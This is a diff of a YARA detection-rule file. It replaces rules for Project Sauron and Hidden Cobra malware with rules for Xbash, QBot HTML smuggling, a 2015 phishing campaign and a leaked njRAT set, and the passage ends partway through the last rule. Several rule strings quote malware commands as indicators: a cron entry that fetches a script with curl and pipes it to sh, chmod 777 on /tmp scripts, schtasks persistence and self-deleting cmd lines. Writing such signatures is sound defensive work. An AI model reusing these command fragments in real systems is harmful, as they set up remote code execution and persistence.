+		hash1 = "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
 
 	strings:
-		$s2 = "\\*\\3vpn" ascii
-		$op0 = { 55 8b ec 83 ec 0c 53 56 33 f6 39 75 08 57 89 75 }
-		$op1 = { 59 59 c3 8b 65 e8 ff 75 88 ff 15 50 20 40 00 ff }
-		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 12 0f 82 a7 }
+		$s1 = { 73 58 62 61 73 68 00 00 00 00 00 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) and all of ( $op* ) )
+		uint16( 0 ) == 0x457f and filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M3 : FILE
+rule SIGNATURE_BASE_MAL_Xbash_SH_Sep18 : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
+		description = "Detects Xbash malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "555b37a2-6a3c-539f-81dc-24c739795510"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L169-L186"
+		id = "450ef15f-fe9c-5809-9077-457a43326bfe"
+		date = "2018-09-18"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_xbash.yar#L27-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "739414990d112dd16e01831408ba745b04fae7621eb9074f73babbc40b69e1ad"
+		logic_hash = "b48cbd64002025d861e2fd381be5a68efd7f6fc5fd239850c940f887e2b01673"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec"
+		hash1 = "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
+		hash2 = "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
 
 	strings:
-		$s1 = "ExampleProject.dll" fullword ascii
-		$op0 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 ba }
-		$op1 = { ff 15 34 20 00 10 85 c0 59 a3 60 30 00 10 75 04 }
-		$op2 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 00 20 00 }
+		$s1 = "echo \"*/5 * * * * curl -fsSL" fullword ascii
+		$s2 = ".sh|sh\" > /var/spool/cron/root" ascii
+		$s3 = "#chmod +x /tmp/hawk" fullword ascii
+		$s4 = "if [ ! -f \"/tmp/root.sh\" ]" fullword ascii
+		$s5 = ".sh > /tmp/lower.sh" ascii
+		$s6 = "chmod 777 /tmp/root.sh" fullword ascii
+		$s7 = "-P /tmp && chmod +x /tmp/pools.txt" fullword ascii
+		$s8 = "-C /tmp/pools.txt>/dev/null 2>&1" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) and all of ( $op* ) )
+		uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M4 : FILE
+rule SIGNATURE_BASE_MAL_Xbash_JS_Sep18 : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
+		description = "Detects XBash malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "32717ace-ff56-5b5b-8ed9-4bb353886eea"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L188-L206"
+		id = "e891d146-f92d-5144-a1f2-ad308e309870"
+		date = "2018-09-18"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_xbash.yar#L50-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0735ba9591a9cf06cd13ba480b4559ef83105ab08ffcec21ebbbfdf3766edb93"
+		logic_hash = "cf2f9006e0ab07f6ff1a0ce4946af34468f7c74143c853c5d77c6db725bb590a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57"
+		hash1 = "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
 
 	strings:
-		$s1 = "xpsmngr.dll" fullword wide
-		$s2 = "XPS Manager" fullword wide
-		$op0 = { 89 4d e8 89 4d ec 89 4d f0 ff d2 3d 08 00 00 c6 }
-		$op1 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 04 20 5b }
-		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 b6 }
+		$s1 = "var path=WSHShell" fullword ascii
+		$s2 = "var myObject= new ActiveXObject(" ascii
+		$s3 = "window.resizeTo(0,0)" fullword ascii
+		$s4 = "<script language=\"JScript\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
+		filesize < 5KB and 3 of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M6 : FILE
+rule SIGNATURE_BASE_MAL_Qbot_HTML_Smuggling_Indicators_Oct22_1 : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
+		description = "Detects double encoded PKZIP headers as seen in HTML files used by QBot"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1aa6dd43-52ac-5321-9941-767833073c37"
-		date = "2016-08-09"
+		id = "8034d6af-4dae-5ff6-b635-efb5175fe4d1"
+		date = "2022-10-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L208-L226"
+		reference = "https://twitter.com/ankit_anubhav/status/1578257383133876225?s=20&t=Bu3CCJCzImpTGOQX_KGsdA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_qbot_payloads.yar#L2-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "95ca9a0b2e71e7152d20a01d238e7362024c6dac6fc95ed2ebfa96dcbc8dbd40"
+		logic_hash = "a5bd9eb72205f1398ec0b8773751309699b3267e0272dacf2728f8495c0c0ec2"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8"
+		hash1 = "4f384bcba31fda53e504d0a6c85cee0ce3ea9586226633d063f34c53ddeaca3f"
+		hash2 = "8e61c2b751682becb4c0337f5a79b2da0f5f19c128b162ec8058104b894cae9b"
+		hash3 = "c5d23d991ce3fbcf73b177bc6136d26a501ded318ccf409ca16f7c664727755a"
+		hash4 = "5072d91ee0d162c28452123a4d9986f3df6b3244e48bf87444ce88add29dd8ed"
+		hash5 = "ff4e21f788c36aabe6ba870cf3b10e258c2ba6f28a2d359a25d5a684c92a0cad"
 
 	strings:
-		$s1 = "rseceng.dll" fullword wide
-		$s2 = "Remote Security Engine" fullword wide
-		$op0 = { 8b 0d d5 1d 00 00 85 c9 0f 8e a2 }
-		$op1 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
-		$op2 = { 80 75 29 85 c9 79 25 b9 01 }
+		$sd1 = "VUVzREJCUUFBUUFJQ"
+		$sd2 = "VFc0RCQlFBQVFBSU"
+		$sd3 = "VRXNEQkJRQUFRQUlB"
+		$sdr1 = "QJFUUBFUUCJERzVUV"
+		$sdr2 = "USBFVQBFlQCR0cFV"
+		$sdr3 = "BlUQRFUQRJkQENXRV"
+		$st1 = "VlVWelJFSkNVVUZCVVVGSl"
+		$st2 = "ZVVnpSRUpDVVVGQlVVRkpR"
+		$st3 = "WVVZ6UkVKQ1VVRkJVVUZKU"
+		$st4 = "VkZjMFJDUWxGQlFWRkJTV"
+		$st5 = "ZGYzBSQ1FsRkJRVkZCU1"
+		$st6 = "WRmMwUkNRbEZCUVZGQlNV"
+		$st7 = "VlJYTkVRa0pSUVVGUlFVbE"
+		$st8 = "ZSWE5FUWtKUlFVRlJRVWxC"
+		$st9 = "WUlhORVFrSlJRVUZSUVVsQ"
+		$str1 = "UUpGVVVCRlVVQ0pFUnpWVV"
+		$str2 = "FKRlVVQkZVVUNKRVJ6VlVW"
+		$str3 = "RSkZVVUJGVVVDSkVSelZVV"
+		$str4 = "VVNCRlZRQkZsUUNSMGNGV"
+		$str5 = "VTQkZWUUJGbFFDUjBjRl"
+		$str6 = "VU0JGVlFCRmxRQ1IwY0ZW"
+		$str7 = "QmxVUVJGVVFSSmtRRU5YUl"
+		$str8 = "JsVVFSRlVRUkprUUVOWFJW"
+		$str9 = "CbFVRUkZVUVJKa1FFTlhSV"
+		$htm = "<html" ascii
+		$eml = "Content-Transfer-Encoding:" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
+		filesize < 10MB and ( ( 1 of ( $sd* ) and $htm and not $eml ) or ( 1 of ( $st* ) and $eml ) )
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M7 : FILE
+rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_1 : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
+		description = "Phishing Wave - file p0o6543f.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5e83e1a-872d-53b3-a74a-b1a9b4a89168"
-		date = "2016-08-09"
+		id = "3335ad3c-47f8-5547-bac0-df2d98ff644f"
+		date = "2015-12-02"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L228-L261"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_phish_gina_dec15.yar#L8-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d132ddeb1d26b035565d3707b73d401fb413315febe26ac291cb05bfeca7c41d"
+		hash = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"
+		logic_hash = "91fc1b4682c1490b916b11685e1ecc74a964d657e544c0b84e8301b299154d02"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd"
-		hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca"
 
 	strings:
-		$sx1 = "Default user" fullword wide
-		$sx2 = "Hincorrect header check" fullword ascii
-		$sa1 = "MSAOSSPC.dll" fullword ascii
-		$sa2 = "MSAOSSPC.DLL" fullword wide
-		$sa3 = "MSAOSSPC" fullword wide
-		$sa4 = "AOL Security Package" fullword wide
-		$sa5 = "AOL Security Package" fullword wide
-		$sa6 = "AOL Client for 32 bit platforms" fullword wide
-		$op0 = { 8b ce 5b e9 4b ff ff ff 55 8b ec 51 53 8b 5d 08 }
-		$op1 = { e8 0a fe ff ff 8b 4d 14 89 46 04 89 41 04 8b 45 }
-		$op2 = { e9 29 ff ff ff 83 7d fc 00 0f 84 cf 0a 00 00 8b }
-		$op3 = { 83 f8 0c 0f 85 3a 01 00 00 44 2b 41 6c 41 8b c9 }
-		$op4 = { 44 39 57 0c 0f 84 d6 0c 00 00 44 89 6f 18 45 89 }
-		$op5 = { c1 ed 02 83 c6 fe e9 68 fe ff ff 44 39 57 08 75 }
+		$s1 = "netsh.exe" fullword wide
+		$s2 = "routemon.exe" fullword wide
+		$s3 = "script=" fullword wide
+		$s4 = "disconnect" fullword wide
+		$s5 = "GetClusterResourceTypeKey" fullword ascii
+		$s6 = "QueryInformationJobObject" fullword ascii
+		$s7 = "interface" fullword wide
+		$s8 = "connect" fullword wide
+		$s9 = "FreeConsole" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( 3 of ( $s* ) and 3 of ( $op* ) ) or ( 1 of ( $sx* ) and 1 of ( $sa* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_Hiddencobra_Rule_1
+rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_2 : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Malware"
-		author = "US CERT"
-		id = "921c027e-fac3-5419-b0a6-5043f5cde466"
-		date = "2017-06-13"
+		description = "Phishing Wave used MineExplorer Game by WangLei - file p0o6543f.exe.4"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ed6f6dc8-5b5d-5a6f-a2a0-cb8a34c8931f"
+		date = "2015-12-03"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L11-L29"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_phish_gina_dec15.yar#L31-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e8bb844d72b7d7564caec0d0842889000c77611eeb24ac5c5cb35072a92c9d10"
+		logic_hash = "f5eb21d0f635171e1edcfecc909bc3508dfb6c32e7fdd7263edd5cd98e6ba411"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d6b21ded749b57042eede07c3af1956a3c9f1faddd22d2f78e43003a11ae496f"
+		hash2 = "561b16643992b92d37cf380bc2ed7cd106e4dcaf25ca45b4ba876ce59533fb02"
 
 	strings:
-		$rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94
-            A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77
-            48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39
-            73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2
-            AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED
-            39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68
-            3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13
-            B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}
+		$s1 = "Email: W0067@990.net" fullword wide
+		$s2 = "MineExplorer Version 1.0" fullword wide
+		$s6 = "Copy Rights by WangLei 1999.4" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Hiddencobra_Rule_3
+rule SIGNATURE_BASE_PHISH_02Dez2015_Attach_P_ORD_C_10156_124658 : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Malware"
-		author = "US CERT"
-		id = "39c7e039-4b07-575d-a93a-539ecc4e63d8"
-		date = "2017-06-13"
+		description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8989379a-6cd9-52ba-be18-5d402a440758"
+		date = "2015-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L52-L82"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_phish_gina_dec15.yar#L49-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c0e385e46fe9d6cde7d2bc8ef059cfd8c33ef5b17e9fcd7cea97863fb8d2c24"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7
-         44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41
-         00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0
-         6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24
-         48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89
-         44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24
-         18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89
-         44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00
-         66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B
-         6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05
-         83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00
-         00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B
-         FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2
-         49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33
-         C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83
-         E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00
-         8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1
-         C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8
-         ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4
-         48 C3 }
+		logic_hash = "a2820b024b371447eab71f153b6251776719cfe55e08cb2a3cda5ee6da29949d"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
+		hash2 = "e6c5b55586e9d99551adc27a0fc9c080cea6201fae60104b82d5a2ec518fafb6"
+		hash3 = "80f278b7268ea6814f8b336e07c5f4b03289519e199fbe4cbd9ef6a38cf25df6"
+		hash4 = "3a0a758525883a049a42312e46a023076c31af23b5e8e5b81fec56d51e4c80fb"
+		hash5 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
+		hash6 = "d9db7d32949c4df6a5d9d0292b576ae19681be7b6e0684df57338390e87fc6d6"
+		hash7 = "7bb705701ae73d377f6091515a140f0af57703719a67da9a60fad4544092ee6c"
+		hash8 = "e743c6e7749ab1046a2beea8733d7c8386ea60b43492bb4f0769ced6a2cee66d"
+
+	strings:
+		$s1 = "Execute" ascii
+		$s2 = "Process WriteParameterFiles" fullword ascii
+		$s3 = "WScript.Shell" fullword ascii
+		$s4 = "STOCKMASTER" fullword ascii
+		$s5 = "InsertEmailFax" ascii
 
 	condition:
-		$randomUrlBuilder
+		uint16( 0 ) == 0xcfd0 and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_1 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Lsls : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Sample"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6955294-84a4-5694-87c9-b5b1c39e0fae"
-		date = "2018-08-11"
+		id = "c6c4aa72-1a84-552f-bea0-38b332a74233"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L87-L101"
+		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L13-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b1e72ca66520152b444cc415bdf54921ebba9671519d3b0327316cee2bf0ba1d"
+		logic_hash = "c6542391e8d1a4fe4d26fd8b2dfb1fcab7b39c67dcc6495f2e5f95c4d6f8d61c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05a567fe3f7c22a0ef78cc39dcf2d9ff283580c82bdbe880af9549e7014becfc"
+		hash1 = "94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9"
 
 	strings:
-		$s1 = "%s\\%s.dll" fullword wide
-		$s2 = "PROXY_SVC_DLL.dll" fullword ascii
+		$x1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 3000KB and $x1
 }
-rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_2 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_C : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra Sample"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dab5b0ec-ae89-521e-bbb9-15602db9ed6c"
-		date = "2018-08-11"
+		id = "cb0bcdc4-7eca-59b7-a947-85c232d4e599"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L103-L119"
+		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L28-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "878711f5e1a8a3cfefdaf13fc08a4778fba9d2f729248784cf72b610c8bc5e17"
+		logic_hash = "cfdc7ce8b89a16d2ae604268a030bd41259fed87a7f37b0dca8f7c467703c7f2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "45e68dce0f75353c448865b9abafbef5d4ed6492cd7058f65bf6aac182a9176a"
+		hash1 = "17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7"
 
 	strings:
-		$s1 = "ping 127.0.0.1 -n 3" fullword wide
-		$s2 = "Process32" fullword ascii
-		$s11 = "%2d%2d%2d%2d%2d%2d" fullword ascii
-		$s12 = "del /a \"" fullword wide
+		$x1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
+		$x2 = "schtasks /create /sc minute /mo 1 /tn Server /tr " fullword wide
+		$x3 = "www.upload.ee/image/" wide
+		$s1 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
+		$s2 = "/Server.exe" fullword wide
+		$s3 = "Executed As " fullword wide
+		$s4 = "WmiPrvSE.exe" fullword wide
+		$s5 = "Stub.exe" fullword ascii
+		$s6 = "Download ERROR" fullword wide
+		$s7 = "shutdown -r -t 00" fullword wide
+		$s8 = "Select * From AntiVirusProduct" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_1 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_System3 : FILE
 {
 	meta:
-		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "923a0812-f375-5c0c-a22c-fc71ddcad4e3"
-		date = "2019-04-13"
+		id = "097f4506-295d-5066-8895-2148436731c1"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L124-L137"
+		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L57-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6cd036129ea54f4e3a2c52bf9ebd04e2d368e737cf83ca34a8feb79ea477a3af"
+		logic_hash = "8292ae1de39c57bc5ed6fa078570e92dbcd22cd13d5b5f22d158986708139fbe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "73fa84cff51d384c2d22d9e53fc5d42cb642172447b07e796c81dd403fb010c2"
 
 	strings:
-		$s1 = "www.naver.com" fullword ascii
-		$s2 = "PolarSSL Test CA0" fullword ascii
+		$a1 = "WmiPrvSE.exe" fullword wide
+		$s1 = "C:\\Users\\sgl\\AppData\\Local\\" ascii
+		$s2 = "Temporary Projects\\WmiPrvSE\\" ascii
+		$s3 = "$15a32a5d-4906-458a-8f57-402311afc1c1" fullword ascii
 
 	condition:
-		filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_2 : FILE
+
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal1 : FILE
 {
 	meta:
-		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c7fd381-272a-5cfc-a7ee-7f0f9221fa04"
-		date = "2019-04-13"
+		id = "8516bbfb-a2ad-565d-bf6c-71629b1831a1"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L139-L154"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L77-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "741d69b470ac230d502116ebd5f09bbf4bdbbbdd7e70b97a4bd5d3f2c8e148ef"
+		logic_hash = "cf532761d07ee3e84028a9071409f081a7a85728d55c215c912f0b70902f101f"
 		score = 75
